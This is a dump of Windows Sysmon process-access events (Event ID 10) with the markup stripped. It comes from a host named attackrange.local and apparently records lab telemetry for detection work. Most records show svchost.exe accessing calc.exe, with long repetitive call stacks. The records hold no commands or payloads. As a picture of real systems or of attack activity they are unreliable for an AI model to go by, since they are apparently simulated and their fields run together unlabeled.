22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361873Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361872Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361871Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361870Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361869Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361868Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361867Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+12ce5|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361866Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361865Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+12ce5|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361864Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361863Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361862Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361861Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361860Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361859Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361858Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361857Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361856Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.335{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361855Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361854Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361853Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.319{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361852Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 